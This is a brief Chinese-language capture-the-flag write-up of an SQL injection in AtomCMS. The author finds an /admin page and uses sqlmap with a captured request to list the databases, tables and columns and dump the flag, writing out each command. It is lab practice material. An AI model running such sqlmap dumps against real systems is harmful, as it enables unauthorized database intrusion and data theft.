简介
AtomCMS SQL注入漏洞
正文
首先进入靶场我们发现没有什么有用的东西。
找到注入点
但是我们都知道在春秋没有东西那就可以尝试访问/admin,或许就会有东西呢,结果真给我碰到了。
既然已经告诉我们是sql注入,那我们就直接进行抓包跑sqlmap吧
爆库名
python sqlmap.py -r 2.txt -batch -dbs
爆表名
python sqlmap.py -r 2.txt -batch -D atomcms --tables
爆列名
python sqlmap.py -r 2.txt -batch -D atomcms -T flag -columns
爆数据
python sqlmap.py -r 2.txt -batch -D atomcms -T flag -C flag -dump
最后
有个很奇怪的地方,我们最开始在没有跑sqlmap的时候我们是无法进去到这个界面,它会自动跳转到登录界面,现在跑完sqlmap后,我们就可以访问到这个界面,且右上角还把flag显示出来了。真的好奇怪欸!
不是我不想手注,主要是我注入没成功,没办法只好用工具,我真的好菜哇!